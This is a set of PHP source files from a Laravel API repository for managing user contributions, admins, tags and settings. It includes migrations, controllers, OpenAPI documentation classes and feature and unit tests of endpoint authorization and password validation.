"num_lines": 32,
"path": "/database/migrations/2019_05_28_173719_create_contribution_tag_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateContributionTagTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('contribution_tag', function (Blueprint $table): void {\n $table->uuid('contribution_id');\n $table->foreign('contribution_id')->references('id')->on('contributions');\n $table->uuid('tag_id');\n $table->foreign('tag_id')->references('id')->on('tags');\n $table->primary(['contribution_id', 'tag_id']);\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('contribution_tag');\n }\n}\n"
},
{
"alpha_fraction": 0.5823217034339905,
"alphanum_fraction": 0.585356593132019,
"avg_line_length": 29.298851013183594,
"blob_id": "56d419fb70a7e7a29b6d3bbd224c2dcc5e10cd64",
"content_id": "2037099173dd046e36248a263b1cac2c98bbeec0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 5272,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 174,
"path": "/tests/Feature/V1/Contribution/ApproveControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\Contribution;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionApprovedSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass ApproveControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_approve(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_approve(): void\n {\n $contribution = factory(Contribution::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_public(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PUBLIC)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_private(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_PRIVATE)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_cannot_approve_changes_requested(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_CHANGES_REQUESTED)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_approve_in_review(): void\n {\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_approve(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $contribution): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Approved 
contribution [{$contribution->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_end_user_for_approve(): void\n {\n Queue::fake();\n\n $contribution = factory(Contribution::class)\n ->state(Contribution::STATUS_IN_REVIEW)\n ->create();\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->putJson(\"/v1/contributions/{$contribution->id}/approve\");\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail) use ($contribution): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === $contribution->endUser->user->email\n && $mail->getSubject() === Arr::get($emailContent, 'end_user.contribution_approved.subject')\n && $mail->getBody() === Arr::get($emailContent, 'end_user.contribution_approved.body')\n && $mail->getSubstituter() instanceof ContributionApprovedSubstituter;\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5914546251296997,
"alphanum_fraction": 0.5919346809387207,
"avg_line_length": 34.91379165649414,
"blob_id": "54921896cd0fd010656cdbb604209890b0c0ec8a",
"content_id": "6bb9ce9144c079eaadbbad237eb7d2204f5d8673",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2083,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 58,
"path": "/app/Docs/Operations/Contributions/RejectContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Schemas\\Contribution\\ContributionSchema;\nuse App\\Docs\\Schemas\\ResourceSchema;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\RequestBody;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass RejectContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_PUT)\n ->summary('Reject a specific contribution')\n ->description(\n Utils::operationDescription(\n [Admin::class],\n 'This endpoint can only be invoked if the contribution is either public or in review.'\n )\n )\n ->tags(ContributionsTag::create())\n ->requestBody(\n RequestBody::create()->required()->content(\n MediaType::json()->schema(\n Schema::object()\n ->required('changes_requested')\n ->properties(\n Schema::string('changes_requested')\n )\n )\n )\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n ResourceSchema::create(null, ContributionSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.647493839263916,
"alphanum_fraction": 0.6483155488967896,
"avg_line_length": 20.73214340209961,
"blob_id": "1427d6c626515691fa8e073a1dfbaade905681fd",
"content_id": "a5e9ffdc17db80e2093c9b26b2fa5a6b42196610",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1217,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 56,
"path": "/app/Models/Relationships/UserRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse App\\Models\\FileToken;\nuse App\\Models\\Notification;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasMany;\nuse Illuminate\\Database\\Eloquent\\Relations\\HasOne;\n\ntrait UserRelationships\n{\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function audits(): HasMany\n {\n return $this->hasMany(Audit::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function notifications(): HasMany\n {\n return $this->hasMany(Notification::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasMany\n */\n public function fileToken(): HasMany\n {\n return $this->hasMany(FileToken::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasOne]\n */\n public function admin(): HasOne\n {\n return $this->hasOne(Admin::class);\n }\n\n /**\n * @return \\Illuminate\\Database\\Eloquent\\Relations\\HasOne\n */\n public function endUser(): HasOne\n {\n return $this->hasOne(EndUser::class);\n }\n}\n"
},
{
"alpha_fraction": 0.6567656993865967,
"alphanum_fraction": 0.6600660085678101,
"avg_line_length": 15.833333015441895,
"blob_id": "8d32f19e6ec883c430720698f5a7a52bc99def25",
"content_id": "e581b74f6c1574b0a1434f1d955e99e466ca083e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 303,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 18,
"path": "/app/Http/Controllers/LandingController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers;\n\nuse Illuminate\\Contracts\\View\\View;\n\nclass LandingController extends WebController\n{\n /**\n * @return \\Illuminate\\Contracts\\View\\View\n */\n public function __invoke(): View\n {\n return view('landing.index');\n }\n}\n"
},
{
"alpha_fraction": 0.5942744612693787,
"alphanum_fraction": 0.5952615737915039,
"avg_line_length": 21.021739959716797,
"blob_id": "e497ba0804d9e6363be7aa884b1565090f0db793",
"content_id": "8e8a8f25e542f7744d8e46616e991feb46ea93ca",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1013,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 46,
"path": "/app/VariableSubstitution/Email/Admin/PasswordResetSubstituter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\VariableSubstitution\\Email\\Admin;\n\nuse App\\Models\\Admin;\nuse App\\VariableSubstitution\\BaseVariableSubstituter;\n\nclass PasswordResetSubstituter extends BaseVariableSubstituter\n{\n /**\n * @var \\App\\Models\\Admin\n */\n protected $admin;\n\n /**\n * @var string\n */\n protected $passwordResetUrl;\n\n /**\n * PasswordResetSubstituter constructor.\n *\n * @param \\App\\Models\\Admin $admin\n * @param string $passwordResetUrl\n */\n public function __construct(Admin $admin, string $passwordResetUrl)\n {\n $this->admin = $admin;\n $this->passwordResetUrl = $passwordResetUrl;\n }\n\n /**\n * @return array\n */\n protected function variables(): array\n {\n return [\n 'ADMIN_EMAIL' => $this->admin->user->email,\n 'ADMIN_NAME' => $this->admin->name,\n 'ADMIN_PHONE' => $this->admin->phone,\n 'PASSWORD_RESET_URL' => $this->passwordResetUrl,\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.6025437116622925,
"alphanum_fraction": 0.6041335463523865,
"avg_line_length": 16.97142791748047,
"blob_id": "45eea8160308a70afe12d403a3fc0b7e8b96c8e8",
"content_id": "e302c4ec06343fcb913b361fe879812127a4bf2a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 629,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 35,
"path": "/app/Policies/SettingPolicy.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Policies;\n\nuse App\\Models\\User;\nuse Illuminate\\Auth\\Access\\HandlesAuthorization;\n\nclass SettingPolicy\n{\n use HandlesAuthorization;\n\n /**\n * Determine whether the user can list settings.\n *\n * @param \\App\\Models\\User|null $user\n * @return bool\n */\n public function list(?User $user): bool\n {\n return true;\n }\n\n /**\n * Determine whether the user can update the settings.\n *\n * @param \\App\\Models\\User $user\n * @return bool\n */\n public function update(User $user): bool\n {\n return $user->isAdmin();\n }\n}\n"
},
{
"alpha_fraction": 0.5715571641921997,
"alphanum_fraction": 0.5724572539329529,
"avg_line_length": 22.14583396911621,
"blob_id": "205ee62985c273f6842ef05b76fabaaaafe4a91c",
"content_id": "fa6605eb0a7032e06f1cc6e23de8906fc38f96a5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1111,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 48,
"path": "/tests/Unit/Rules/PasswordTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Unit\\Rules;\n\nuse App\\Rules\\Password;\nuse Tests\\TestCase;\n\nclass PasswordTest extends TestCase\n{\n /** @test */\n public function it_passes_strong_password(): void\n {\n $rule = new Password();\n\n $result = $rule->passes('test', '@bcd3fgH');\n\n $this->assertTrue($result);\n }\n\n /** @test */\n public function it_fails_weak_password(): void\n {\n $rule = new Password();\n\n $result = $rule->passes('test', 'secret');\n\n $this->assertFalse($result);\n }\n\n /** @test */\n public function message_is_correct(): void\n {\n $rule = new Password();\n $specialCharacters = Password::ALLOWED_SPECIAL_CHARACTERS;\n\n $message = <<<EOT\n The :attribute must be at least eight characters long, \n contain one uppercase letter, \n one lowercase letter, \n one number and one special character ({$specialCharacters}).\n EOT;\n $message = str_replace(PHP_EOL, '', $message);\n\n $this->assertEquals($message, $rule->message());\n }\n}\n"
},
{
"alpha_fraction": 0.7686062455177307,
"alphanum_fraction": 0.7726657390594482,
"avg_line_length": 31.130434036254883,
"blob_id": "78436a0e92c783972df0e1d27bc23aabaed85e61",
"content_id": "3ba10085182e09420da7c5994967becfd00cf435",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 739,
"license_type": "permissive",
"max_line_length": 93,
"num_lines": 23,
"path": "/app/Docs/SecurityRequirement.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse App\\Docs\\SecuritySchemes\\OAuth2SecurityScheme;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityRequirement as BaseSecurityRequirement;\n\nclass SecurityRequirement extends BaseSecurityRequirement\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\SecurityRequirement\n */\n public static function create(string $objectId = null): BaseObject\n {\n return BaseSecurityRequirement::create($objectId)\n ->securityScheme(OAuth2SecurityScheme::create());\n }\n}\n"
},
{
"alpha_fraction": 0.5998049378395081,
"alphanum_fraction": 0.6014304161071777,
"avg_line_length": 38.43589782714844,
"blob_id": "44e81f2a884ef36c5ba01a9d5c4e419f0dfd8efc",
"content_id": "b040f9d67183bf92e2d4c7c5f5b2e899f61b7841",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3076,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 78,
"path": "/app/Docs/OpenApi.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\OpenApi as BaseOpenApi;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\JsonResponse;\nuse Illuminate\\Http\\Response;\n\nclass OpenApi extends BaseOpenApi implements Responsable\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return static\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->openapi(static::OPENAPI_3_0_2)\n ->info(Info::create())\n ->servers(Server::create())\n ->paths(\n Paths\\Admins\\AdminsRootPath::create(),\n Paths\\Admins\\AdminsMePath::create(),\n Paths\\Admins\\AdminsNestedPath::create(),\n Paths\\Audits\\AuditsRootPath::create(),\n Paths\\Audits\\AuditsNestedPath::create(),\n Paths\\Contributions\\ContributionsRootPath::create(),\n Paths\\Contributions\\ContributionsNestedPath::create(),\n Paths\\Contributions\\ContributionsApprovePath::create(),\n Paths\\Contributions\\ContributionsRejectPath::create(),\n Paths\\EndUsers\\EndUsersRootPath::create(),\n Paths\\EndUsers\\EndUsersMePath::create(),\n Paths\\EndUsers\\EndUsersNestedPath::create(),\n Paths\\Exports\\ExportsRequestPath::create(),\n Paths\\Files\\FilesRequestPath::create(),\n Paths\\Files\\FilesDownloadPath::create(),\n Paths\\Notifications\\NotificationsRootPath::create(),\n Paths\\Notifications\\NotificationsNestedPath::create(),\n Paths\\Settings\\SettingsRootPath::create(),\n Paths\\Tags\\TagsRootPath::create(),\n Paths\\Tags\\TagsNestedPath::create()\n )\n ->components(Components::create())\n ->security(SecurityRequirement::create())\n ->tags(\n Tags\\AdminsTag::create(),\n Tags\\AuditsTag::create(),\n Tags\\ContributionsTag::create(),\n Tags\\EndUsersTag::create(),\n Tags\\ExportsTag::create(),\n Tags\\FilesTag::create(),\n Tags\\NotificationsTag::create(),\n Tags\\SettingsTag::create(),\n Tags\\TagsTag::create()\n )\n ->externalDocs(ExternalDocs::create());\n }\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\JsonResponse\n */\n public function toResponse($request): JsonResponse\n {\n return response()->json($this->toArray(), Response::HTTP_OK, [\n 'Content-Disposition' => 'inline; filename=\"openapi.json\"',\n 'Content-Type' => 'application/json; charset=utf-8',\n ]);\n }\n}\n"
},
{
"alpha_fraction": 0.6630434989929199,
"alphanum_fraction": 0.6739130616188049,
"avg_line_length": 8.199999809265137,
"blob_id": "aa87f911d0a0cf2e299610caa55a31737ba17974",
"content_id": "7182a4c02ed9784efd7fa243aaa9b8f6fb79cadc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 92,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 10,
"path": "/app/Models/Scopes/AuditScopes.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Scopes;\n\ntrait AuditScopes\n{\n //\n}\n"
},
{
"alpha_fraction": 0.5269396305084229,
"alphanum_fraction": 0.5274784564971924,
"avg_line_length": 36.119998931884766,
"blob_id": "fcba85c01d243ec1e55b9c8cb9433dd4b0ef15c0",
"content_id": "81100f2930f6d3e52b5bb8530ecdfef9cdf937c3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1856,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 50,
"path": "/app/Docs/Schemas/EndUser/EndUserSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Schemas\\EndUser;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass EndUserSchema extends Schema\n{\n /**\n * @param string|null $objectId\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->type(static::TYPE_OBJECT)\n ->properties(\n Schema::string('id')\n ->format(static::FORMAT_UUID),\n Schema::string('email'),\n Schema::string('country')\n ->nullable(),\n Schema::integer('birth_year')\n ->nullable(),\n Schema::string('gender')\n ->nullable(),\n Schema::string('ethnicity')\n ->nullable(),\n Schema::integer('contributions_count'),\n Schema::integer('public_contributions_count'),\n Schema::integer('private_contributions_count'),\n Schema::integer('in_review_contributions_count'),\n Schema::integer('changes_requested_contributions_count'),\n Schema::string('gdpr_consented_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('email_verified_at')\n ->format(static::FORMAT_DATE_TIME)\n ->nullable(),\n Schema::string('created_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('updated_at')\n ->format(static::FORMAT_DATE_TIME),\n Schema::string('deleted_at')\n ->format(static::FORMAT_DATE_TIME)\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7116104960441589,
"alphanum_fraction": 0.7128589153289795,
"avg_line_length": 28.66666603088379,
"blob_id": "1d69d1d4434d4cf282d023707cd2c172b75ca17f",
"content_id": "8e4744096099d72be5700c83e1869d5f7ad94ec7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 801,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 27,
"path": "/app/Docs/Paths/Notifications/NotificationsRootPath.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Notifications;\n\nuse App\\Docs\\Operations\\Notifications\\IndexNotificationOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\n\nclass NotificationsRootPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @throws \\ReflectionException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/notifications')\n ->operations(\n IndexNotificationOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7047772407531738,
"alphanum_fraction": 0.7058507800102234,
"avg_line_length": 31.6842098236084,
"blob_id": "246f2b90b0fbe1933742def5946b9b557caff865",
"content_id": "a25915c852b0e175416b82748e6679d849fcd474",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1863,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 57,
"path": "/app/Http/Controllers/V1/Contribution/RejectController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1\\Contribution;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Contribution\\RejectContributionRequest;\nuse App\\Http\\Resources\\ContributionResource;\nuse App\\Models\\Contribution;\nuse App\\Services\\ContributionService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Support\\Facades\\DB;\n\nclass RejectController extends ApiController\n{\n /**\n * RejectController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n */\n public function __construct(Request $request, Pagination $pagination)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified']);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Contribution\\RejectContributionRequest $request\n * @param \\App\\Services\\ContributionService $contributionService\n * @param \\App\\Models\\Contribution $contribution\n * @throws \\Illuminate\\Auth\\Access\\AuthorizationException\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function __invoke(\n RejectContributionRequest $request,\n ContributionService $contributionService,\n Contribution $contribution\n ): JsonResource {\n $this->authorize('reject', $contribution);\n\n $contribution = DB::transaction(\n function () use ($request, $contributionService, $contribution): Contribution {\n return $contributionService->reject($contribution, $request->changes_requested);\n }\n );\n\n event(EndpointInvoked::onUpdate($request, \"Rejected contribution [{$contribution->id}].\"));\n\n return new ContributionResource($contribution);\n }\n}\n"
},
{
"alpha_fraction": 0.5317381024360657,
"alphanum_fraction": 0.539049506187439,
"avg_line_length": 24.939655303955078,
"blob_id": "2755424edb1cb0b0fbc776dc44080d4715dc2892",
"content_id": "ce270f757b7cb33e674199704eef672ae1b7a3d2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3009,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 116,
"path": "/tests/Feature/V1/Admin/MeControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1\\Admin;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\EndUser;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Event;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass MeControllerTest extends TestCase\n{\n /*\n * Invoke.\n */\n\n /** @test */\n public function guest_cannot_invoke(): void\n {\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_invoke(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertResourceDataStructure([\n 'id',\n 'name',\n 'phone',\n 'email',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_invoke(): void\n {\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $response = $this->getJson('/v1/admins/me');\n\n $response->assertJsonFragment([\n 'id' => $admin->id,\n 'name' => $admin->name,\n 'phone' => $admin->phone,\n 'email' => $admin->user->email,\n 'created_at' => $admin->user->created_at->toIso8601String(),\n 'updated_at' => $admin->user->updated_at->toIso8601String(),\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_invoke(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\Admin $admin */\n $admin = factory(Admin::class)->create();\n\n Passport::actingAs($admin->user);\n\n $this->getJson('/v1/admins/me');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($admin): bool {\n return $event->getUser()->is($admin->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === \"Viewed admin [{$admin->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.5631141066551208,
"alphanum_fraction": 0.5653817057609558,
"avg_line_length": 21.049999237060547,
"blob_id": "0dd9559b7ef4792fc7dc362e95d818a9a1a899fb",
"content_id": "f49d58a8367c0809fa70814a89ee50813b804661",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1323,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 60,
"path": "/tests/Unit/Support/MarkdownTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
